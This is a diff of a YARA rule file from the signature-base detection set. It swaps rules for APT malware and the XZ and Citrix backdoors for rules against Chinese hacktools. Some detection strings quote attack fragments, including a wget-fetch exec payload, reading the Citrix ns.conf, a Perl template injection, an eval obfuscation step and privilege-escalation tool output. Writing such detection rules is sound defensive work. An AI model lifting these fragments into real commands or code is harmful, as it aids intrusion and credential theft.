-		hash1 = "6f208473df0d31987a4999eeea04d24b069fdb6a8245150aa91dfdc063cd64ab"
-		hash2 = "6cc1f4ecd28b833c978c8e21a20a002459b4a6c21a4fbaad637111aa9d5b1a32"
 
 	strings:
-		$s1 = "%S:\\Users\\public" fullword wide
-		$s2 = "ntuser.dat.swp" fullword wide
-		$s3 = "Job Save / Load Config" fullword wide
-		$s4 = ".?AVPSCL_CLASS_JOB_SAVE_CONFIG@@" fullword ascii
-		$s5 = "winupdate64.com" fullword ascii
-		$s6 = "Job Save KeyLogger" fullword wide
+		$s9 = "[Failed to load winpcap packet.dll." wide
+		$s10 = "PacketX Version" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1920KB and all of them
 }
-rule SIGNATURE_BASE_Glassrat
+rule SIGNATURE_BASE_Sqldbx_Zhs : FILE
 {
 	meta:
-		description = "Detects GlassRAT by RSA (modified by Florian Roth - speed improvements)"
-		author = "RSA RESEARCH"
-		id = "7739d1f6-f16d-5599-9388-a1d89dbeb355"
-		date = "2015-11-03"
+		description = "Chinese Hacktool Set - file SqlDbx_zhs.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "31c49755-f1bd-5ecb-91ff-1040e40983ab"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_glassRAT.yar#L8-L43"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L198-L217"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "939d2cb11ff414641f68b2913fe8d24458e1fd7ba450b8781072bb10da3ad039"
+		hash = "e34228345498a48d7f529dbdffcd919da2dea414"
+		logic_hash = "b0215d29c58c252c1717f08135eab65794a99ed669c2225bcba690ae7d7a034c"
 		score = 75
 		quality = 85
-		tags = ""
-		Info = "GlassRat"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$bin1 = {85 C0 B3 01}
-		$bin3 = {68 4C 50 00 10}
-		$bin4 = {68 48 50 00 10}
-		$bin5 = {68 44 50 00 10}
-		$hs = {CB FF 5D C9 AD 3F 5B A1 54 13 FE FB 05 C6 22}
-		$s1 = "pwlfnn10,gzg"
-		$s2 = "AddNum"
-		$s3 = "ServiceMain"
-		$s4 = "The Window"
-		$s5 = "off.dat"
+		$s0 = "S.failed_logins \"Failed Login Attempts\", " fullword ascii
+		$s7 = "SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLE" fullword ascii
+		$s8 = "SELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'" ascii
+		$s9 = "bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:" ascii
+		$s11 = "L.login_policy_name AS \"Login Policy\", " fullword ascii
+		$s12 = "mailto:support@sqldbx.com" fullword ascii
+		$s15 = "S.last_login_time \"Last Login\", " fullword ascii
 
 	condition:
-		all of ( $bin* ) and $hs and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule SIGNATURE_BASE_Glassrat_Generic : FILE
+rule SIGNATURE_BASE_Ms10048_X86 : FILE
 {
 	meta:
-		description = "Detects GlassRAT Malware"
+		description = "Chinese Hacktool Set - file ms10048-x86.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d09c4a9f-15ad-56d7-b015-94f494420e98"
-		date = "2015-11-23"
+		id = "373f0419-5a7d-5f01-968c-5d3e7b1c0670"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/peering-into-glassrat/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_glassRAT.yar#L45-L72"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L219-L237"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fdd309c403e53bfa80340c1334f90fd5ef5f4618737b19069a07f7aa63aeb23d"
-		score = 80
+		hash = "e57b453966e4827e2effa4e153f2923e7d058702"
+		logic_hash = "50e45cae87f5d1cc4903a16f9283dd751d90cde0c71f3124467b4ff15bd34f1b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "30d26aebcee21e4811ff3a44a7198a5c519843a24f334880384a7158e07ae399"
-		hash2 = "3bdeb3805e9230361fb93c6ffb0bfec8d3aee9455d95b2428c7f6292d387d3a4"
-		hash3 = "79993f1912958078c4d98503e00dc526eb1d0ca4d020d17b010efa6c515ca92e"
-		hash4 = "a9b30b928ebf9cda5136ee37053fa045f3a53d0706dcb2343c91013193de761e"
-		hash5 = "c11faf7290299bb13925e46d040ed59ab3ca8938eab1f171aa452603602155cb"
-		hash6 = "d95fa58a81ab2d90a8cbe05165c00f9c8ad5b4f49e98df2ad391f5586893490d"
-		hash7 = "f1209eb95ce1319af61f371c7f27bf6846eb90f8fd19e8d84110ebaf4744b6ea"
 
 	strings:
-		$s1 = "cmd.exe /c %s" fullword ascii
-		$s2 = "update.dll" fullword ascii
-		$s3 = "SYSTEM\\CurrentControlSet\\Services\\RasAuto\\Parameters" fullword ascii
-		$s4 = "%%temp%%\\%u" fullword ascii
-		$s5 = "\\off.dat" ascii
-		$s6 = "rundll32 \"%s\",AddNum" fullword ascii
-		$s7 = "cmd.exe /c erase /F \"%s\"" fullword ascii
-		$s8 = "SYSTEM\\ControlSet00%d\\Services\\RasAuto" fullword ascii
+		$s1 = "[ ] Resolving PsLookupProcessByProcessId" fullword ascii
+		$s2 = "The target is most likely patched." fullword ascii
+		$s3 = "Dojibiron by Ronald Huizer, (c) master@h4cker.us ." fullword ascii
+		$s4 = "[ ] Creating evil window" fullword ascii
+		$s5 = "%sHANDLEF_INDESTROY" fullword ascii
+		$s6 = "[+] Set to %d exploit half succeeded" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 15MB and 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
 }
-rule SIGNATURE_BASE_EXPL_Shitrix_Exploit_Code_Jan20_1 : FILE CVE_2019_19781
+rule SIGNATURE_BASE_Dos_Ch : FILE
 {
 	meta:
-		description = "Detects payloads used in Shitrix exploitation CVE-2019-19781"
+		description = "Chinese Hacktool Set - file ch.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7fab3a9b-82a5-573a-b210-2ae65f1a7f24"
-		date = "2020-01-13"
+		id = "2e8319de-fe54-5083-968c-4707d127f072"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_shitrix.yar#L2-L29"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L239-L257"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "00687b30235be5ef3c00432b5b96bbc325dee553e7c0cb565d6f389b1bce12de"
-		score = 70
+		hash = "60bbb87b08af840f21536b313a76646e7c1f0ea7"
+		logic_hash = "49ab2c75267c2ed5c15c8fbdc6fa0f8826f6e7a45a2861d6ba4b293ffca6bcd6"
+		score = 75
 		quality = 85
-		tags = "FILE, CVE-2019-19781"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s01 = "/netscaler/portal/scripts/rmpm.pl" ascii
-		$s02 = "tee /netscaler/portal/templates/" ascii
-		$s03 = "exec(\\'(wget -q -O- http://" ascii
-		$s04 = "cd /netscaler/portal; ls" ascii
-		$s05 = "cat /flash/nsconfig/ns.conf" ascii
-		$s06 = "/netscaler/portal/scripts/PersonalBookmak.pl" ascii
-		$s07 = "template.new({'BLOCK'='print readpipe(" ascii
-		$s08 = "pwnpzi1337" fullword ascii
-		$s09 = "template.new({'BLOCK'="
-		$s10 = "template.new({'BLOCK'%3d"
-		$s11 = "my ($citrixmd, %FORM);"
-		$s12 = "(CMD, \"($citrixmd) 2>&1"
-		$b1 = "NSC_USER:" ascii nocase
-		$b2 = "NSC_NONCE:" ascii nocase
-		$b3 = "/../" ascii
+		$s0 = "/Churraskito/-->Usage: Churraskito.exe \"command\" " fullword ascii
+		$s4 = "fuck,can't find WMI process PID." fullword ascii
+		$s5 = "/Churraskito/-->Found token %s " fullword ascii
+		$s8 = "wmiprvse.exe" fullword ascii
+		$s10 = "SELECT * FROM IIsWebInfo" fullword ascii
+		$s17 = "WinSta0\\Default" fullword ascii
 
 	condition:
-		1 of ( $s* ) or all of ( $b* )
+		uint16( 0 ) == 0x5a4d and filesize < 260KB and 3 of them
 }
-rule SIGNATURE_BASE_Sofacy_Fybis_ELF_Backdoor_Gen1 : FILE
+rule SIGNATURE_BASE_Dubrute_Dubrute : FILE
 {
 	meta:
-		description = "Detects Sofacy Fysbis Linux Backdoor"
+		description = "Chinese Hacktool Set - file DUBrute.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6abf33e-9c5b-5e0f-b7f0-a0741bf9cc3a"
-		date = "2016-02-13"
-		modified = "2023-01-27"
-		reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_fysbis.yar#L9-L35"
+		id = "10aa2017-d563-5953-8672-dbc13ff6b3cf"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L259-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fb5239aa75512c8c83b066e64b75469f90fb22cb0918af1e44edb29e7ab38206"
-		score = 80
+		hash = "8aaae91791bf782c92b97c6e1b0f78fb2a9f3e65"
+		logic_hash = "1e6d8bd24a37e3f4b7de88989251ae904128ff1bf766d4a4408ff8990c6dfd2f"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
-		hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
 
 	strings:
-		$x1 = "Your command not writed to pipe" fullword ascii
-		$x2 = "Terminal don`t started for executing command" fullword ascii
-		$x3 = "Command will have end with \\n" fullword ascii
-		$s1 = "WantedBy=multi-user.target' >> /usr/lib/systemd/system/" ascii
-		$s2 = "Success execute command or long for waiting executing your command" fullword ascii
-		$s3 = "ls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"" fullword ascii
-		$s4 = "rm -f /usr/lib/systemd/system/" ascii
-		$s5 = "ExecStart=" fullword ascii
-		$s6 = "<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>" fullword ascii
+		$s1 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
+		$s2 = "IP - 0; Login - 0; Password - 0; Combination - 0" fullword ascii
+		$s3 = "Create %d IP@Loginl;Password" fullword ascii
+		$s4 = "UBrute.com" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 500KB and 1 of ( $x* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1020KB and all of them
 }
-rule SIGNATURE_BASE_Sofacy_Fysbis_ELF_Backdoor_Gen2 : FILE
+rule SIGNATURE_BASE_Cookietools : FILE
 {
 	meta:
-		description = "Detects Sofacy Fysbis Linux Backdoor"
+		description = "Chinese Hacktool Set - file CookieTools.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d4e3a8bb-b23a-53a4-b5fb-b321a3417b43"
-		date = "2016-02-13"
+		id = "893884e5-6f4c-5f67-9382-8bf1ee45a257"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_fysbis.yar#L37-L55"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L277-L294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1d50a789e9c43fce27f3ad390cbdd9533c61e4f263cec1aa1abfba6545e55c57"
-		score = 80
+		hash = "b6a3727fe3d214f4fb03aa43fb2bc6fadc42c8be"
+		logic_hash = "7f8c59ef58a92db15d8965e54ed6e26834e268581581af2a0ff98a6f46564e7e"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
-		hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
-		hash3 = "fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61"
 
 	strings:
-		$s1 = "RemoteShell" ascii
-		$s2 = "basic_string::_M_replace_dispatch" fullword ascii
-		$s3 = "HttpChannel" ascii
+		$s0 = "http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=" fullword ascii
+		$s2 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
+		$s3 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
+		$s8 = "OnGetPasswordP" fullword ascii
+		$s12 = "http://www.chinesehack.org/" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 500KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 4 of them
 }
-rule SIGNATURE_BASE_BKDR_Xzutil_Script_CVE_2024_3094_Mar24_1 : CVE_2024_3094
+rule SIGNATURE_BASE_Update_Pcinit : FILE
 {
 	meta:
-		description = "Detects make file and script contents used by the backdoored XZ library (xzutil) CVE-2024-3094."
-		author = "Florian Roth"
-		id = "6b62ffc2-d0a7-5810-97a3-c48f7fac300e"
-		date = "2024-03-30"
-		modified = "2024-04-24"
-		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/bkdr_xz_util_cve_2024_3094.yar#L2-L17"
+		description = "Chinese Hacktool Set - file PcInit.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "71c34049-97a2-5611-a081-21a85f8631d9"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L296-L314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3"
-		logic_hash = "8d3f5f078a5c827208e04acb7ac1496f473e1236f92561f94d2a3c8156c68ea6"
-		score = 80
+		hash = "a6facc4453f8cd81b8c18b3b3004fa4d8e2f5344"
+		logic_hash = "ee4b17dfb0d70464669edab1b7610efa607adb2918306ae6c50130024008a169"
+		score = 75
 		quality = 85
-		tags = "CVE-2024-3094"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "/bad-3-corrupt_lzma2.xz | tr " ascii
-		$x2 = "/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|" ascii
-		$x3 = "eval $zrKcKQ" ascii
+		$s1 = "\\svchost.exe" ascii
+		$s2 = "%s%08x.001" fullword ascii
+		$s3 = "Global\\ps%08x" fullword ascii
+		$s4 = "drivers\\" ascii
+		$s5 = "StrStrA" fullword ascii
+		$s6 = "StrToIntA" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_BKDR_Xzutil_Binary_CVE_2024_3094_Mar24_1 : CVE_2024_3094 FILE
+rule SIGNATURE_BASE_Dat_Nasllib : FILE
 {
 	meta:
-		description = "Detects injected code used by the backdoored XZ library (xzutil) CVE-2024-3094."
-		author = "Florian Roth"
-		id = "6ccdeb6d-67c4-5358-a76b-aef7f047c997"
-		date = "2024-03-30"
-		modified = "2024-04-24"
-		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/bkdr_xz_util_cve_2024_3094.yar#L19-L46"
+		description = "Chinese Hacktool Set - file NaslLib.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5ce72a4-c2b0-50b2-85bb-acf0bfd354e0"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L316-L331"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed364484ff598b0818f9b3249673e684b52394c25b14e47fbca25a5f96ecc970"
+		hash = "fb0d4263118faaeed2d68e12fab24c59953e862d"
+		logic_hash = "7d2f3c67fe78028a51ba01c88d7eb62c38fe3c918bb03eee41b6583bc464ad78"
 		score = 75
 		quality = 85
-		tags = "CVE-2024-3094, FILE"
-		hash1 = "319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae"
-		hash2 = "605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4"
-		hash3 = "8fa641c454c3e0f76de73b7cc3446096b9c8b9d33d406d38b8ac76090b0344fd"
-		hash4 = "b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963"
-		hash5 = "cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537"
-		hash6 = "5448850cdc3a7ae41ff53b433c2adbd0ff492515012412ee63a40d2685db3049"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$op1 = { 48 8d 7c 24 08 f3 ab 48 8d 44 24 08 48 89 d1 4c 89 c7 48 89 c2 e8 ?? ?? ?? ?? 89 c2 }
-		$op2 = { 31 c0 49 89 ff b9 16 00 00 00 4d 89 c5 48 8d 7c 24 48 4d 89 ce f3 ab 48 8d 44 24 48 }
-		$op3 = { 4d 8b 6c 24 08 45 8b 3c 24 4c 8b 63 10 89 85 78 f1 ff ff 31 c0 83 bd 78 f1 ff ff 00 f3 ab 79 07 }
-		$xc1 = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 }
+		$s1 = "nessus_get_socket_from_connection: fd <%d> is closed" fullword ascii
+		$s2 = "[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%d" fullword ascii
+		$s3 = "A FsSniffer backdoor seems to be running on this port%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and ( all of ( $op* ) or $xc1 )
+		uint16( 0 ) == 0x5a4d and filesize < 1360KB and all of them
 }
-rule SIGNATURE_BASE_BKDR_Xzutil_Killswitch_CVE_2024_3094_Mar24_1 : CVE_2024_3094
+rule SIGNATURE_BASE_Dos_1 : FILE
 {
 	meta:
-		description = "Detects kill switch used by the backdoored XZ library (xzutil) CVE-2024-3094."
-		author = "Florian Roth"
-		id = "0d28bec4-1d3a-5af0-9e9e-49486fcc62e1"
-		date = "2024-03-30"
-		modified = "2024-04-24"
-		reference = "https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01?permalink_comment_id=5006558#gistcomment-5006558"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/bkdr_xz_util_cve_2024_3094.yar#L48-L60"
+		description = "Chinese Hacktool Set - file 1.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f1cc1b3-bce2-5a29-849e-ee7deb5e8809"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L333-L347"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b2024d4b8346c4f74524bb7f3c6b2850684c19471a00e6fa60fff1c41e4a86b6"
-		score = 85
+		hash = "b554f0687a12ec3a137f321cc15e052ff219f28c"
+		logic_hash = "d4cf3e738743e5402602e045cf590b969dca2d6f7f1bdd57cc398df3392560d9"
+		score = 75
 		quality = 85
-		tags = "CVE-2024-3094"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj"
+		$s1 = "/churrasco/-->Usage: Churrasco.exe \"command to run\"" fullword ascii
+		$s2 = "/churrasco/-->Done, command should have ran as SYSTEM!" fullword ascii
 
 	condition:
-		$x1
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_OBFUSC_SH_Indicators_Mar24_1 : FILE
+rule SIGNATURE_BASE_Othertools_Servu : FILE
 {
 	meta:
-		description = "Detects characteristics found in obfuscated script (used in the backdoored XZ package, but could match on others, too)"
-		author = "Florian Roth"
-		id = "f9fcc326-75d6-5a5a-a8b5-7de15a11448e"
-		date = "2024-04-06"
-		modified = "2024-04-24"
-		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4/1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/bkdr_xz_util_cve_2024_3094.yar#L62-L75"
+		description = "Chinese Hacktool Set - file svu.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b750d090-8726-5d21-98ba-6cb050cb7174"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L349-L365"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b5abf8184e0b1b18ccc513e00e9db241b4983923ae97f495396d73f0fb162192"
-		score = 60
+		hash = "5c64e6879a9746a0d65226706e0edc7a"
+		logic_hash = "fda476bdcc0bb496331ca9f506a1221d401d8671d23f61f1b88219c688163169"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "eval $"
+		$s0 = "MZKERNEL32.DLL" fullword ascii
+		$s1 = "UpackByDwing@" fullword ascii
+		$s2 = "GetProcAddress" fullword ascii
+		$s3 = "WriteFile" fullword ascii
 
 	condition:
-		uint8( 1 ) == 0x3d and $s1 in ( filesize -20 .. filesize )
+		uint32( 0 ) == 0x454b5a4d and $s0 at 0 and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_APT_Equation_Group_Op_Triangulation_Triangledb_Implant_Jun23_1 : FILE
+rule SIGNATURE_BASE_Ustrrefadd : FILE
 {
 	meta:
-		description = "Detects TriangleDB implant found being used in Operation Triangulation on iOS devices (maybe also used on macOS systems)"
-		author = "Florian Roth"
-		id = "d81a5103-41c8-5dba-a560-8fb5514f6c0a"
-		date = "2023-06-21"
+		description = "Chinese Hacktool Set - file ustrrefadd.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e6701e7e-bb15-5e0c-822b-3e29342e083c"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/triangledb-triangulation-implant/110050/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_triangulation_jun23.yar#L2-L18"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L367-L384"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "486b19ddb8b182dbba882359f7eb416735e76f9cda5aea1b290fb5c6b44960c5"
-		score = 80
+		hash = "b371b122460951e74094f3db3016264c9c8a0cfa"
+		logic_hash = "e44f180e081494e28b35b4129eb2c1817ed3e83f23d86f0d3dd4dcf27941cdf1"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "unmungeHexString" ascii fullword
-		$s2 = "CRPwrInfo" ascii fullword
-		$s3 = "CRConfig" ascii fullword
-		$s4 = "CRXConfigureDBServer" ascii fullword
+		$s0 = "E-Mail  : admin@luocong.com" fullword ascii
+		$s1 = "Homepage: http://www.luocong.com" fullword ascii
+		$s2 = ": %d  -  " fullword ascii
+		$s3 = "ustrreffix.dll" fullword ascii
+		$s5 = "Ultra String Reference plugin v%d.%02d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xfacf and filesize < 30MB and $s1 and 2 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 320KB and all of them
 }
-rule SIGNATURE_BASE_Winnti_Fonfig : FILE
+rule SIGNATURE_BASE_Xscanlib : FILE
 {
 	meta:
-		description = "Winnti sample - file fonfig.exe"
+		description = "Chinese Hacktool Set - file XScanLib.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca3c186c-0286-5b9b-9585-7680336c8c3d"
-		date = "2017-01-25"
+		id = "e1e2cfad-7cbb-51c3-9b55-648c47af641e"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/VbvJtL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_ms_report_201701.yar#L10-L24"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L386-L402"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "715892268431bf76cf9bf0bdbeaf4129befdc590b5b2dcae479d95dfe77561a4"
+		hash = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
+		logic_hash = "ff18c527df9ff2a4d72bcc5e4905d6f42877d42536edcb13608c6e0e6773aa63"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2c9882854a60c624ecf6b62b6c7cc7ed04cf4a29814aa5ed1f1a336854697641"
 
 	strings:
-		$s1 = "mciqtz.exe" fullword wide
-		$s2 = "knat9y7m" fullword ascii
+		$s4 = "XScanLib.dll" fullword ascii
+		$s6 = "Ports/%s/%d" fullword ascii
+		$s8 = "DEFAULT-TCP-PORT" fullword ascii
+		$s9 = "PlugCheckTcpPort" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 360KB and all of them
 }
-rule SIGNATURE_BASE_Winnti_Nlaifsvc : FILE
+rule SIGNATURE_BASE_Idtools_For_Winxp_Idttool : FILE
 {
 	meta:
-		description = "Winnti sample - file NlaifSvc.dll"
+		description = "Chinese Hacktool Set - file IdtTool.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d2bfcad4-9762-5f2a-88cc-e8cdc648e710"
-		date = "2017-01-25"
+		id = "c157d467-87f8-59d5-a3ba-e4fbeeba767d"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/VbvJtL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_ms_report_201701.yar#L26-L42"
